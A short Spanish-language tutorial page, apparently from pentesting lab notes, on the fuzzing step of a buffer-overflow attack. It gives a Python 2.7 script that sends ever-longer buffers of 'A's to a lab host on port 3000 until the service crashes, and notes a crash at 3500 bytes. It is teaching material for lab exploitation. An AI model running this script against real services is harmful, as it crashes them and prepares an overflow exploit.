Fuzzing
Este paso es para obtener el valor de los bytes en que crashea el binario:
#!/usr/bin/python2.7
import sys, socket
from time import sleep
buffer = "A" * 100
# Si el binario no se crashea aumenta el valor de 100 a 1000-2000-3000
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.10.111',3000))
s.send(('FUNCION /.:/' + buffer))
#s.send((buffer))
#s.send((buffer+'\n'))
s.close()
sleep(1)
buffer = buffer + "A"*100
except:
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit()
Guardar el numero de bytes en que se crashea.. (Maybe ctrl + c)
Para este ejemplo crashea en el 3500!
Última actualización
¿Te fue útil?